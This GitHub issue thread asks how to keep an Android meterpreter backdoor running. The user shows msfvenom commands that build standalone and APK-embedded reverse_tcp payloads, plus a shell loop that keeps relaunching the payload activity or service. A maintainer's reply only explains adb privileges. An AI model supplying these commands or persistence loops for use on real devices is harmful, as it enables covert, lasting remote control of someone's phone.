### ISSUE TITLE
Persistence android payload 

### ISSUE THREAD

**Issue by karpiyon** [rapid7/metasploit-payloads#554]
Hi,
How can I make teh payload persistence, that is keep connecting after the backdoor.apk is closed?
I am aware of a shell script to loop every N seconds and try to reconnect...
```
while true
	do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
	sleep 20
done
```
The above works well when I generate a stand alone backdoor using `msfvenom -p android/meterpreter/reverse_tcp` .
The payload is generated, on the mobile device under: `data/app/com.metasploit`, therefore the above shell script can access `com.metasploit.stage/.MainActivity`.

However, when using an embedded payload:` msfvenom -x someApk.apk -p android/meterpreter/reverse_tcp...` the persistence script does not work since no 'com.metasploit.stage' is generated.

How can make an imbedded backdoor persistence?
Or, how can I alter the above script to run on imbedded backdoors?

Thanks

**Comment by karpiyon** [comment]
SUCCESS
After many tried I finally got it to start the embedded payload.

The problem I encounter now is this:
During the first session, I upload and run the persistence script:

while true...
  do am startservice...
  sleep 10
done
I do:

shell
sh ./persistance .shell
CTRL +C or CTRL +Z
Y
I get a report the service is running.
I then close the app, the session dies and when I try t run it again, in msfconsole, it never reconnects.

If I externally run:
adb shell do am startservice... it connects.

Why is that?
I am testing on android 10.

**Comment by bcoles** [comment]
> If I externally run: `adb shell do am startservice..`. it connects.
> 
> Why is that? I am testing on android 10.

ADB is for debugging - it is not subject to the same restrictions as apps. Commands executed using `adb` have significantly higher privileges than apps. Apps are executed as a restricted user in a restricted SELinux context. ADB is executed with `adb` user privileges with `shell` SELinux context.

**Comment by karpiyon** [comment]
Thanks, the adb was just to verify my service is legit.
I guess the reason it is not running is related to my other question here:
[https://github.com/rapid7/metasploit-framework/issues/16375](url)
